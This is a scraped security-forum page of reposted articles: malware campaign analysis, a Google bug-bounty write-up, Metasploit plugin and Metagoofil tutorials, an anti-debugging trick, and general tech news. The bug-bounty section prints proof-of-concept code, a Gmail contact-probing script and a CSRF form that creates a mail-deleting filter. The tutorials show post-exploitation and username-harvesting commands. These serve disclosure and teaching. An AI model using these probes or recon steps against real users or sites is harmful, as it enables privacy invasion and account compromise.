Nytro

Pentru cei interesati: WebGL Cross-Domain Image Stealer

[h=1]Spam campaign uses Blackhole exploit kit to install SpyEye[/h] by Sébastien Duquette Malware Researcher This article was written in collaboration with my colleague Jean-Ian Boutin. The Wigon botnet (also known as Cutwail) is being used in a massive spam campaign. A multitude of ruses are used to get the user to click on a link: fake LinkedIn or Facebook notifications, free Windows licenses, fake deliveries etc. The links are pointing to the Blackhole exploit kit which attempts to install malware on the computer via unpatched security flaws. The kit attempts to use the recently added exploit CVE-2011-3544 for Java. A lot of systems have not yet been patched for this vulnerability leaving them at risk of being compromised; screenshots of Blackhole panels published by french malware researchers Xylitol and Malekal both show infection success rates over 80%. CVE-2011-3544 now exploited by Blackhole The following screenshot shows a part of the decompiled code of the Java applet used by Blackhole which is exploiting the flaw. JAR file exploiting CVE-2011-3544 One of the file dropped through this spam campaign is a SpyEye sample detected as Win32/Spy.SpyEye Trojan by ESET. This banking trojan was configured to steal banking information from clients of BAWAG PSK, the fourth largest bank in Austria. Once a computer is infected, the malware has the ability to change the webpages content seen by the user when visiting BAWAG eBanking services. The following screenshots show that the phishing warning as well as the bank contact information is removed from the login page by the malware . Phishing warnings and contact information removed by SpyEye Once the user logs in, his personal information is stored and sent to the C&C server. According to the SpyEye tracker, the C&C server used by this sample is still online and is hosted in Azerbaijan. An obfuscated JavaScript is inserted in the eBanking webpage and is used to transfer money from the user account to the cybercriminal account. This script has also the ability to hide operations that were done on the user account by modifying the content of the account balance and transfer history. The following screenshot shows a code snippet used to modify the account balance in order to hide a transfer that has already occurred. Finally, here is a screenshot showing the code used to send status information when a successful transfer occurs. BAWAG PSK has been notified of this targeted attack. As always we advise our readers not to click links in spam or suspicious messages and to keep their installed software and antivirus up to date. Sursa: Blackhole and SpyEye used in spam campaign | ESET ThreatBlog

[h=1]Microsoft to begin silently updating IE in 2012[/h] Angela Moscaritolo December 15, 2011 Coming next month, Internet Explorer (IE) users will no longer have to manually upgrade their web browser. Microsoft, beginning in January, will automatically upgrade Windows customers to the latest version of IE available for their PC, Ryan Gavin, senior director of IE, said in a blog post Thursday. The Redmond, Wash.-based computing giant's move to embrace what is known as “silent updates” follows actions already taken by Google, which pioneered the concept for its Chrome web browser in 2009, and Mozilla, which announced recently it is working on a mechanism for automatic Firefox updates. Microsoft is aiming to better protect users from threats, such as social-engineered malware, which often targets out-of-date web browsers, Gavin said. “The web overall is better – and safer – when more people run the most up-to-date browser,” he wrote. “Our goal is to make sure that Windows customers have the most up-to-date and safest browsing experience possible, with the best protections against malicious software, such as malware.” Industry experts agreed that silent updates are a step forward for security. “Silent updating is generally seen as a big improvement to security on the internet,” Wolfgang Kandek, CTO of vulnerability management firm Qualys, wrote in a blog post Thursday. Kandek referenced a study conducted by researchers at the Swiss technical university ETH, which found that 97 percent of Chrome users updated their browser within three weeks of a new version release, compared to 85 percent of Firefox users, 53 percent of those using Apple Safari, and 24 percent of Opera users. Silent updates allow systems to stay secure “most of the time,” take some of the onus for security off users, and shorten the window of opportunity attackers have to use known exploits against outdated browsers, according to the study. Microsoft said that beginning in January, IE will be silently upgraded for customers who have opted-in to automatic updates on the Windows Update service. It will begin first with customers in Australia and Brazil, then “take a measured approach, scaling up over time.” The silent update will eliminate the pop-up window that currently allows users to opt-out or postpone available browser upgrades, Kandek said. Users who have declined previous installations of IE8 and 9 will not be automatically updated. Additionally, customers can uninstall updates and continue to receive support for the copy of IE they purchased with Windows. Enterprise users who tightly control their patches will not be affected, as they will still have full control over the versions of their browsers, Kandek said. Sursa: Microsoft to begin silently updating IE in 2012 - SC Magazine US

[h=1]Hacking Google for Fun and Profit[/h]Dec 14th, 2011 At the end of last year, Google announced their Vulnerability Reward Program which rewards security researchers for reported security and privacy holes in Google properties. This sounded like an interesting challenge, and I set out to find security holes. I found three, got paid, and am now in the Google Security Hall of Fame. All and all, a rewarding experience. Below I describe the three security holes that I found. [h=2]Determining if a user has emailed another user[/h] In my opinion, this is the most subtle, but also the most disturbing, of the three bugs. As with the other bugs that I found, this was an example of Cross Site Request Forgery- the practice of convincing a user’s browser to make a request on their behalf to a remote server. This type of attack generally only works when the user is logged in to the remote service. In this case, if a user is already logged into Gmail (and they usually are), a malicious website could make a series of requests for Gmail profile images and, based on the return codes, determine whether or not the visitor had communicated with another Gmail user. This worked because Gmail, as a well-intentioned privacy measure, would only show profile images to a viewer if they had had mutual contact. Here is some example code that worked at the time: checkUsername[TABLE] [TR] [TD=class: gutter] 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 [/TD] [TD=class: code] function checkUsername(username, callback) { var image = new Image(); image.onload = function() { callback(true); }; image.onerror = function() { callback(false); }; image.src = "https://mail.google.com/mail/photos/" + username + "%40gmail.com?1&rp=1&pld=1&r=" + (new Date()).getTime(); } checkUsername("fbi-reports", function(hasEmailed) { alert("The current visitor " + (hasEmailed ? "has" : "has not") + " emailed the FBI."); }); checkUsername("wikileaks", function(hasEmailed) { alert("The current visitor " + (hasEmailed ? "has" : "has not") + " emailed WikiLeaks."); [/TD] [/TR] [/TABLE] It should be clear why this is a serious privacy concern. If you suspected someone of being a whistleblower, for example, you could make a page that probed a bunch of revealing email addresses and checked to see if any had been contacted. Luckily, Google reports that they have now fixed this bug. Cross Site Request Forgery attacks can usually be prevented by adding a CSRF token (a unique and user-specific token) to every request. [h=2]Identification of a user’s Gmail address[/h] This bug would have allowed a malicious website to determine your Google username if you were simultaneously logged into your Google account and typed anything into a seemingly innocuous web form. One of the fields in the form would actually be an iframe pointing to a public Google Document. When the user typed into the field, they would really be entering text into the Google Document, and what appeared to be their cursor in the field would actually be the Google Document insertion point. When a user typed into the field, the attacker could determine their username (and hence email address) by observing the publicly-displayed list of current document editors. Again, this is a type of Cross Site Request Forgery, specifically known as Clickjacking, which can be especially hard to prevent. There are many types of Clickjacking, almost all of which use iframes. One approach, which I used here, is to artfully display content from a target site in such a way as to look like it’s part of the current page. Another approach is to hide the iframe invisibly under the user’s cursor, moving it as the cursor moves, and causing the user to click on the other site without realizing it. Google correctly used the X-XSS-Protection.aspx) and X-Frame-Options headers, but some browsers do not honor these. The solution to this one is tricky, but it is generally to use frame busting, to provide appropriate headers, to use CSRF tokens, and to not expose any user information without a direct user interaction. [h=2]Deletion of all future email[/h] The third bug that I found was a fairly severe security hole that affected a portion of Gmail users. Due to a missing CSRF token during the first step of the filter creation flow in the HTML-only version of Gmail, a malicious site could trick visitors into creating a Gmail filter that would delete all future received email. This worked in the current (at the time) version of Firefox, but not in Chrome or Safari due to their correct handling of the x-frame-options header. I didn’t test it in IE. This security hole was exploitable via a combination of a classic Cross Site Request Forgery with a Clickjacking attack. First, I discovered that it was possible to submit the first part of the filter creation flow in an iframe using JavaScript because Google had forgotten to include a unique CSRF token in the form. [TABLE] [TR] [TD=class: gutter] 1 2 3 4 5 6 7 8 [/TD] [TD=class: code] <form id='form' method='POST' target='iframe' action='https://mail.google.com/mail/h/ignored/?v=prf' enctype='multipart/form-data'> <input type=hidden name='cf1_hasnot' value='adfkjhsdf'> <input type=hidden name='s' value='z'> <input type=hidden name='cf2_tr' value='true'> <input type=hidden name='cf1_attach' value='false'> <input type=hidden name='nvp_bu_nxsb' value='Next Step'> <input type='submit' style='display: none'> </form> [/TD] [/TR] [/TABLE] I then positioned the iframe such that the “Create Filter” button on the subsequent page would fill the frame without showing the button border; only the word “Create” was visible. A fake button was then shown around the iframe with a style that matched the gmail style such that when the user believed they were submitting a form with a submit button entitled “Create,” they were really creating a malicious and destructive filter in Gmail. Google says this has now been fixed. [h=2]Google’s Response[/h] In all three cases, Google responded promptly to my security report and fixed the bug within a reasonable amount of time. I was given two $500 awards for the three bugs. Google generously doubled these amounts when I chose to donate them to charity, so the Athens Conservency and the Buckeye Forest Council, two of my favorite local charities in Athens, OH, received one thousand dollars each, care of Google. These were subtle bugs. They took trial and error to find. However, in total, I only spent a few spare evenings of my time. If Google’s products- some of the most secure in the world- are suseptible to these sorts of attacks, you can bet many others are as well. Every programer makes these mistakes sometimes. Security is too complicated for anyone to get right all of the time. Check your code! [h=2]Take your security into your own hands… or, why you should hack Google too![/h] Many companies try to silence security bug reporters through legal threats and sometimes even action, driving discoverers of bugs underground and onto the black market where such knowledge can do real harm. Google has set an admirable example by creating a program that is enlightened, responsive, and well-run, and I hope other companies move in the same direction. I had a great time using jsFiddle to explore and demonstrate bugs. You can do the same– check out their guidelines and do your part to improve the security of products that you love. Enjoyed this post? You should follow me on Twitter. Posted by Andrew Cantino Dec 14th, 2011 Hacking Google for fun and profit - andrew makes things

[h=1]Windows 8 aims to take pain out of managing passwords[/h] by Lance Whitney December 15, 2011 9:23 AM PST Juggling passwords for all the Web sites and accounts we use is a neverending challenge, but one that Microsoft hopes to resolve in Windows 8. Protecting yourself on the Internet typically requires the use of passwords. But that process has never been easy or truly safe. Most people either try to remember too many passwords or simply use the same passwords for all their accounts. Both approaches leave the door open for hackers to access your personal information. What's needed is a simpler yet still secure approach. In the latest edition of the Building Windows 8 blog, Dustin Ingalls, a group program manager on Microsoft's security and identity team, explains how both Windows 8 and Internet Explorer 10 will try to adopt that simpler yet secure approach. The upcoming new version of IE will let users store and access the account names and passwords for all of the Web sites and many of the applications they use. You can choose to have IE10 securely house your credentials and then automatically retrieve them when you visit a password-protected site. The new Metro-style apps can also tap into the same feature since developers will be able to design their apps with the ability to store and retrieve user names and passwords. Further, as explained in a previous blog, Windows 8 will allow users to log in with their Windows Live IDs across multiple PCs. Doing so will let you synchronize the same settings and other data from one PC to another. This includes the ability to sync your login credentials to all of your Windows 8 PCs, ensuring that your passwords stay consistent on any PC you choose. As a result, you can set up a complex password for each online account without having to remember it. "When you store credentials in conjunction with signing in to Windows with your Windows Live ID, Windows enables you to set your password for each account to something that is both complex and unique; since Windows 8 will automatically submit the credential on your behalf, you'll never need to remember it yourself. If you need to see the actual password at some point later, you can view it in the credential manager from any of your Trusted PCs." Ingalls explained. The new Windows 8 Credential Manager will help you store and retreive your Web site passwords. (Credit: Microsoft) Windows 7 already offers a Credential Manager through which you can store usernames and passwords, but it looks like the version destined for Windows 8 should provide greater functionality and hopefully ease of use. Of course, the option to allow Windows 8 and Internet 10 to manage your passwords will be totally voluntary. Users not comfortable with this approach can simply choose not to use it. And there are alternatives. Password managers such as RoboForm and LastPass already let you generate, store, and access complex passwords for all your online accounts. To be fully secure, all you need to remember is one single master password to launch the software. But Microsoft is also looking beyond passwords by offering better support for certificates, smart cards, and other alternatives in Windows 8. Though securing your online accounts will probably never be 100 percent easy or foolproof, it's good to see Microsoft at least paying greater attention to this never-ending challenge. Sursa: Windows 8 aims to take pain out of managing passwords | Microsoft - CNET News

Metasploit Pentest Plugin Part 1 Thursday, December 15, 2011 at 11:26AM With the move from Rapid7 to make the framework a repository of modules and have the majority of the automation in the Community and paid versions of metasploit I started several month ago to write a plugin called pentest to cover some of my personal needs and those of friends who have requested them in to a single plugin (Will break in to individual plugins in the future and have master one that will load all) for use from msfconsole. The main areas I have coded so far in my free time have been: Project - For managing of projects inside workspaces for saving data and exporting data from different tables from the Metasploit database. Post Automation - To automate post exploitation tasks. Discovery - For performing network discovery of hosts and services. (Will add discovery thru pivot in the future.) The plugin can be found in my Github account https://github.com/darkoperator/Metasploit-Plugins/blob/master/pentest.rb as time passes I will keep adding new features to it as I need them and as friends coerce me in to adding new stuff for them. Best way to add the plugin to your framework copy is to save it in your metasploit setting folder in your home directory: mkdir -p ~/.msf4/plugins cd ~/.msf4/plugins curl -O https://raw.github.com/darkoperator/Metasploit-Plugins/master/ pentest.rb Once it is downloaded there any instance of the framework you start will have access to it. To load it is is as simple as using the load command and using the help or ? command to see the additional commands that where added by the plugin: msf exploit(handler) > load pentest postauto plugin loaded. [*] Successfully loaded plugin: pentest msf exploit(handler) > ? Discovery Commands ================== Command Description ------- ----------- network_discover Performs a portscan and enumeration of services found for non pivot networks. Project Commands ================ Command Description ------- ----------- project Command for managing projects. Postauto Commands ================= Command Description ------- ----------- app_creds Run application password collection modules against specified sessions. multi_cmd Run shell command against several sessions multi_meter_cmd Run a Meterpreter Console Command against specified sessions. multi_meter_cmd_rc Run resource file with Meterpreter Console Commands against specified sessions. multi_post Run a post module against specified sessions. multi_post_rc Run resource file with post modules and options against specified sessions. sys_creds Run system password collection modules against specified sessions. Projects Many times I find my self experimenting with different datasets as I develop scripts, resource files, modules ..etc and other times I have data of personal clients, I tended to create workspaces inside the framework for this and run several commands and resource scripts to set capture and exporting of data per project, so I added this command to help me manage all of that: msf exploit(handler) > project -h OPTIONS: -a Export all history and DB and archive it in to a zip file for current project. -c Create a new Metasploit project and sets logging for it. -d Delete a project created by the plugin. -h Command Help -l List projects created by plugin. -p <opt> Path to save archive, if none provide default ~/.msf4/archives will be used. -ph Generate resource files for sessions and console. Generate time stamped session logs for current project. -r Create time stamped RC files of Meterpreter Sessions and console history for current project. -s Switch to a project created by the plugin. [B]Creating a new project[/B] To create a new project is as simple as: msf exploit(handler) > project -c pauldotcom Creating DB Workspace named pauldotcom Added workspace: pauldotcom Spooling to file /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_spool.log... msf exploit(handler) > > project -l List of projects: * pauldotcom msf exploit(handler) > > As you can see the command created the workspace called pauldotcom and started logging using spool to *~/.msf4/logs/projects/* one can use the -l switch to list them. You might see a extra ">" added when you manipulate projects, this is do to a bug with the spool command that has been open for a while, hope it gets fixed soon. One of the features I like the most is the ability to create a time stamped resource file that will show all the command I have entered in a session and show the command ran, this can prove quite useful when showing a client what actions where taken and when. Here is an example if I only want to show the commands ran in the console, if we had some meterpreter sessions it would had generated timestamped resource files for those also: msf exploit(handler) > > project -r Writing Console RC file to /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_20111215.3913.rc RC file written List of projects: * pauldotcom msf exploit(handler) > > cat /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_20111215.3913.rc [*] exec: cat /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_20111215.3913.rc # command executed at 2011-12-15 14:06:52 UTC project -l # command executed at 2011-12-15 14:38:13 UTC project -r If we want a full project history that covers: Timestamped session Commands resource file Timestamped Meterpreter session log of commands and output Timestamped console commands resource file Then the -ph would have been used: msf exploit(handler) > > project -ph Writing Console RC file to /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_20111215.0735.rc RC file written Creating RC file for Session 1 Saving RC file to /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_session_1_20111215.0735.rc RC file written Exporting Session 1 history Saving log file to /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_session_1_20111215.0735.log Log file written msf exploit(handler) > > cat /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_session_1_20111215.0735.log [*] exec: cat /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_session_1_20111215.0735.log # Info: uuid: 8chmctur type: meterpreter id: 1 info: 2011-12-15 15:02:57 UTC load stdapi 2011-12-15 15:03:00 UTC load priv 2011-12-15 15:04:24 UTC run checkvm 2011-12-15 15:04:36 UTC run post/windows/gather/win_privs 2011-12-15 15:04:56 UTC run priv 2011-12-15 15:05:08 UTC background 2011-12-15 15:07:20 UTC ls 2011-12-15 15:07:21 UTC Listing: C:\Documents and Settings\Administrator\Desktop ======================================================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100777/rwxrwxrwx 37888 fil 2010-01-25 18:49:24 -0400 macmet.exe 40777/rwxrwxrwx 0 dir 2010-01-17 08:59:54 -0400 .. 40777/rwxrwxrwx 0 dir 2010-02-20 14:48:26 -0400 . 2011-12-15 15:07:25 UTC getuid 2011-12-15 15:07:25 UTC Server username: TESTACCN-X6V582\Administrator 2011-12-15 15:07:28 UTC sysinfo 2011-12-15 15:07:28 UTC Computer : TESTACCN-X6V582 2011-12-15 15:07:28 UTC OS : Windows XP (Build 2600). 2011-12-15 15:07:28 UTC Architecture : x86 2011-12-15 15:07:28 UTC System Language : en_US 2011-12-15 15:07:28 UTC Meterpreter : x86/win32 2011-12-15 15:07:30 UTC background Lets say we finished with a project and are going to share the info with the project manager, other team member or client one can create a single zip file: Spool file of the project Resource files for console and session commands Session history Exported database in xml format To do this we use the -a command for archiving: msf exploit(handler) > > project -a Exporting DB Workspace pauldotcom >> Starting export of report >> Starting export of hosts >> Starting export of events >> Starting export of services >> Starting export of credentials >> Starting export of web sites >> Starting export of web pages >> Starting export of web forms >> Starting export of web vulns >> Finished export of report Finished export of workspace pauldotcom to /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_20111215.1942.xml [ xml ]... Disabling spooling for pauldotcom Spooling disabled for archiving Writing Console RC file to /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_20111215.1942.rc RC file written Creating RC file for Session 1 Saving RC file to /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_session_1_20111215.1942.rc RC file written Exporting Session 1 history Saving log file to /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_session_1_20111215.1942.log Log file written Adding /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_20111215.0514.rc to archive Adding /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_20111215.0735.rc to archive Adding /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_20111215.1942.rc to archive Adding /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_20111215.1942.xml to archive Adding /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_20111215.3813.rc to archive Adding /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_20111215.3833.rc to archive Adding /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_20111215.3840.rc to archive Adding /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_20111215.3913.rc to archive Adding /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_session_1_20111215.0514.log to archive Adding /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_session_1_20111215.0514.rc to archive Adding /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_session_1_20111215.0735.log to archive Adding /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_session_1_20111215.0735.rc to archive Adding /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_session_1_20111215.1942.log to archive Adding /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_session_1_20111215.1942.rc to archive Adding /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_spool.log to archive All files saved to /Users/carlos/.msf4/logs/archives/pauldotcom_20111215.1942.zip MD5 for archive is 97638701e10d9ca8a4f7684bfc1f5d73 Spooling re-enabled Spooling to file /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_spool.log... msf exploit(handler) > > > Carlos Perez Sursa: Security and Networking - Blog - Metasploit Pentest Plugin Part Vedeti sursa, vBulletin de cacat.

Am citit primele parti, e extrem de detaliat cu extrem de multe detalii si de exemple si "trucuri". Cred ca e cea mai buna resursa de Bash scripting, au contribuit si alte persoane cu exemple si idei, sunt specificate acolo. De asemenea se precizeaza si cateva diferente fata de alte limbaje de shell scripting. Recomand.

Here We Go Again, Another Linux Init: Intro to systemd Tuesday, 13 December 2011 07:10 Carla Schroder In the days of yore we had a System V (SysV) type init daemon to manage Linux system startup, and it was good. It was configured with simple text files easily understood by mortals, and it was a friendly constant amid the roiling seas of change. Then came systemd, and once again we Linux users were cast adrift in uncharted waters. Why all this change? Can't Linux hold still for just a minute? Ch Ch Ch Changes Linux has been contentedly using sysvinit (System V initialization) to manage system startups for ever so many years now, except for distributions like Slackware that use the BSD-style init. SysV and BSD init are similar enough that it's easy to use either one without a lot of fuss. Then came two new init systems for Linux: Ubuntu's Upstart, first released in 2006, and systemd, born in 2009. The systemd code was written primarily by Leonard Poettering. Upstart has been the default in Ubuntu since 6.10 Edgy Eft and is available in most distros. systemd is the default init in Fedora 15 and later, and is also in most distro repos for anyone who wants to try it on their favorite Linux. Overhauling key subsystems tends to give users the jitters, because it means being forced to learn new ways to administer our systems and changing our workflow, and the prospects of essential services suffering growing pains and being less-than-reliable aren't happy-making. So what's with this new systemd thingy, and what benefits does it bring to us mere Linux users? Faster Startups The purpose of sysvinit is to launch userspace. At boot the kernel launches PID 1, the very first process to run at startup. (Run the pstree command to see a nice artistic ASCII diagram of your process tree.) It used to be that the BIOS and sysvinit were equal offenders in dragging boot times out to a minute or more. Both have speeded up, but sysvinit is always going to be slow because it starts processes one at a time, performs dependency checks on each one, and waits for daemons to start so more daemons can start. So why not start processes in parallel? There is a way to do this without all kinds of complexities, and that is to take advantage of the way Unix-type daemons work. Clients of Unix daemons don't need to know if the daemons they depend on are actually running — all they need is the correct Unix domain sockets to be available. What the heck are these sockets? They are inter-process communication sockets (IPC), and they are how processes on the local system talk to each other. You can see these with netstat: $ netstat -a --protocol=unixActive UNIX domain sockets (only servers)Proto RefCnt Flags Type State I-Node Pathunix 2 [ ACC ] STREAM LISTENING 4836 /var/run/dbus/system_bus_socketunix 9 [ ] DGRAM 4584 /dev/logunix 3 [ ] STREAM CONNECTED 489456 /tmp/orbit-carla/linc-aaa-0-476044c676da9unix 3 [ ] STREAM CONNECTED 489455 unix 3 [ ] STREAM CONNECTED 489452 /tmp/orbit-carla/linc-8ba-0-45fe9270a46b2[...] As you can see the sockets have inodes, following the tradition of "everything in Unix is a file." So you can perform various operations on them with standard Linux file utilities, which is a fun topic for another day. So all sockets for all daemons can be created in one step, and then all daemons in a second step. Any client requests for daemons that are not yet running will be cached in the socket buffer, and then filled when the daemons are up and running. I'm no kernel hacker so maybe I'm too easily impressed, but this seems like an ingenious and efficient use of something that has been around for decades, and preferable to trying to invent something brand-new. Hotplugging and On-Demand Services sysvinit has a static configuration and launches processes one at a time, in order. When we configure sysvinit we've always had to be mindful of launching them in the correct order, like remembering to start networking before starting network services. And we have to be mindful that everything we might need is launched at startup, or else we will have to start it manually, because after startup sysvinit goes to sleep and doesn't do any more. This might be adequate for simple servers, but not for desktop and mobile systems. Users roam among different networks, attach and remove all manner of devices like keyboards and headsets, audio interfaces, storage media, movies and music — thanks to Bluetooth and USB we finally have universal plug-in ports, and hotplugging devices is routine instead of an exotic adventure. Remember how, way back in olden times, we were warned to never hotplug PS/2 keyboards, mice, or IDE drives because of the risk of physical damage? Even if nothing got fried they were detected only at boot. Auto-detecting and auto-mounting removable devices has gone through a lot of stages in Linux. Remember the fun old days of manually mounting and unmounting CDs and USB sticks? And making fun of Windows and Mac refugees who thought that was weird and dumb? Well, it was weird and dumb. But Linux was still a baby, so we had to deal with it. Then there are network services that could be on-demand like file shares, printers, VNC, SSH, and so on. The bottom line is in these modern times way more stuff happens after startup, so instead of trying to anticipate everything you might need and start it all at boot, why not build a system that launches and stops processes on demand? As an everyday practical matter this seems to address one of my pet peeves, and that is how many distros launch Avahi and the Bluetooth daemons at startup. I have no use for either, so I always disable them. A small matter to be sure, but I like the idea of the computer handling these sorts of chores because I have real work to do. There have been a lot of attempts at subsystems to manage dynamic handling of hardware and software: HAL (hardware abstraction layer), autofs, devfs, and all kinds of other ones I've forgotten. Now we have D-Bus for advanced inter-process communications and management, such as process lifecycle management. D-Bus uses Unix domain sockets as its transport mechanism, and it seems to be here to stay (for example, KDE and Gnome run on D-Bus). So with the extra functionality in D-Bus it seems a natural expansion of duties for systemd, as PID 1, to function as the full-time Linux process babysitter, and bring the efficiencies of parallelization and dynamic resource management to a running system, rather than simply starting the system and then going to sleep until the next reboot. This a bare introduction to the intricacies of systemd and Linux process management. The systemd home page is a great starting point to learn more. Come back next week to learn how to manage and debug systemd on your own systems. Sursa: https://www.linux.com/learn/tutorials/524577-here-we-go-again-another-linux-init-intro-to-systemd

Ca anul trecut: aruncand cu sticle de vin (goale) dupa duba de politie, trecand pe langa jandarmi urland "Asasini, gabori asasini" si tot asa.

Sysinternals: Understanding the UAC with logonsessions. Dos Attack On Window 7-[Metasploit] Hackers wanted. List of Free Sandboxes for Malware Analysis! http://real-hack.com/index.php?topic=3929.0 Suricata IDPE 1.1 Duqu Analysis & Detection Tool Released Process Hacker 2.24 xSQLScanner 1.2 and Mono Version Si multe altele sunt copiate de aici. Trash.

Spargerea parolelor de messenger

Daca il testeaza cineva si merge, sa faca aici un mic review va rog. O sa incerc si eu diseara.

Views: 1,772 There are currently 377... Offtopic (270 viewing)

[h=3]Debuggers Anti-Attaching Techniques - Part 1[/h][h=2]Saturday, December 10, 2011[/h] It's been a while since i played with packing/unpacking tricks. So, i am going to choose some fancy tricks and try to explain them in detail. The story begins when i was trying to analyze a security issue in an infamous application. I tried to attach ollydbg to the running process but the process immediately crashed. I quickly googled "anti-attach tricks" and found many useful links. In the next few posts, i am going to explain those anti-attach tricks. It would surely be better to understand how debuggers attach themselves to running processes in order to understand those tricks and perhaps innovate new ones. The main idea behind attaching is that a debugger calls the "DebugActiveProcess" function which ends up with calling the "RtlCreateUserThread" function to create a new remote thread into the target process, with the "DbgUiRemoteBreakin" function as the new thread entry point. Thread creation occurs in the "DbgUiIssueRemoteBreakin" function, which looks something like the highlighted line in the image below. As far as i see, one way to prevent debuggers from attaching to a process is conducted by hooking the "DbgBreakUiRemoteBreakin" or "DbgBreakPoint" function. I will write a simple executable to demonstrate that. It overwrites the first byte of the "DbgUiRemoteBreakin" function with 0xC3, opcode for retn, thus killing this kind of threads. Similarly, we can patch the "DbgBreakPoint" function. Here you can download the source code for the example above. Trying to attach to such a process, as you can see in the image below, results in an access violation. Bypassing this trick is pretty easy. Just use ollydbg to debug itself, set a breakpoint on the "RtlCreateUserThread" function call, and finally modify its seventh paramter to point to any int3 in the target process address space. Once execution stops at int3 (in the debugged ollydbg), kill the current thread. This way we can by pass any API patching regardless of which function is patched in the target process address space. This bypass trick seems to be impractical. So, i decided to write a simple ollydbg plugin for this situation. The plugin simply patches the "DebugActiveProcess" function in ollydbg.exe to jump to the plugin code. The code gets the target process identifier (pid) from the stack and then writes a few instructions to the the "DbgUiRemoteBreakin" function prologue in this process address space. Here you can download the plugin dll. Here is the virustotal report. N.B. This write-up is based on analysis conducted on Windows XP SP3. Soon, I will extend it to include later operating systems. N.B. The plugin is only tested on windows XP SP3. Sursa: waliedassar: Debuggers Anti-Attaching Techniques - Part 1

Metagoofil Backtrack 5 Tutorial-Metadata Analyzer Information Gathering Tool By Irfan Shakeel Information gathering or foot printing is the vary first step of hacking process and we have discussed so many tutorials for information gathering on backtrack 5 and on other OS like ubuntu and windows. In this article you will learn how to gather information from Metadata of public document from victim websites and the tool is Metagoofil. Metagoofil is an information gathering tool designed for extracting metadata of public documents (pdf,doc,xls,ppt,odp,ods) available in the target/victim websites. It will generate a html page with the results of the metadata extracted, plus a list of potential usernames very useful for preparing a bruteforce attack on open services like ftp, pop3,web applications, vpn, etc. Also it will extract a list of disclosed PATHs in the metadata, with this information you can guess OS, network names, Shared resources, etc. How to Install Metagoofil on Backtrack 5 r1, Ubuntu and Windows The installation process of Metagoofil on Debian based operating system like Ubuntu and backtrack 5 r1 is very easy, all you need to have is metagoofil download it from here. If you are on Ubuntu and on other Linux than you need install the dependencies like [INDENT]root@bt:~# apt-get install extract [/INDENT] If you are on backtrack 5 just like my case than extract is available on backtrack 5 r1, just download and extract metagoofil. For windows user you must have python to use metagoofil. The simple command to get extract data from any website by using Metagoofil is. [INDENT]# python metagoofil.py -d victim.net -l 20 -f all -o output.html -t temp [/INDENT] Here victim.net is the domain name from you want to extract data -f all means you want to find all type of data from (doc,ppt,pdf,xls,odf,sdw and more) -l result search -o output file -t temporary file that will delete after the process The output file will give you some amazing information's like: User name (later we can use for brute force attack) Path directory path (that will help you to understand the structure) Creation date more Other Information Gathering Tutorial FootPrinting-Information Gathering Tutorial FootPrinting-First Step Of Ethical Hacking Dnsmap- DNS Network Mapper Backtrack 5- DNSenum Information Gathering Tool Sursa: Metagoofil Backtrack 5 Tutorial-Metadata Analyzer Information Gathering Tool | Ethical Hacking-Your Way To The World Of IT Security

[h=1]PDFMiner[/h] Python PDF parser and analyzer Homepage Recent Changes PDFMiner API What's It? Download Where to Ask How to Install CJK languages support [*] Command Line Tools pdf2txt.py dumppdf.py PDFMiner API [*] Changes [*] TODO [*] Related Projects [*] Terms and Conditions [h=2]What's It?[/h] PDFMiner is a tool for extracting information from PDF documents. Unlike other PDF-related tools, it focuses entirely on getting and analyzing text data. PDFMiner allows one to obtain the exact location of text in a page, as well as other information such as fonts or lines. It includes a PDF converter that can transform PDF files into other text formats (such as HTML). It has an extensible PDF parser that can be used for other purposes than text analysis. [h=3]Features[/h] Written entirely in Python. (for version 2.4 or newer) Parse, analyze, and convert PDF documents. PDF-1.7 specification support. (well, almost) CJK languages and vertical writing scripts support. Various font types (Type1, TrueType, Type3, and CID) support. Basic encryption (RC4) support. PDF to HTML conversion (with a sample converter web app). Outline (TOC) extraction. Tagged contents extraction. Reconstruct the original layout by grouping text chunks. PDFMiner is about 20 times slower than other C/C++-based counterparts such as XPdf. Online Demo: (pdf -> html conversion webapp) http://pdf2html.tabesugi.net:8080/ [h=3]Download[/h] Source distribution: http://pypi.python.org/pypi/pdfminer/ github: https://github.com/euske/pdfminer/ [h=3]Where to Ask[/h] Questions and comments: http://groups.google.com/group/pdfminer-users/ Detalii: http://www.unixuser.org/~euske/python/pdfminer/index.html

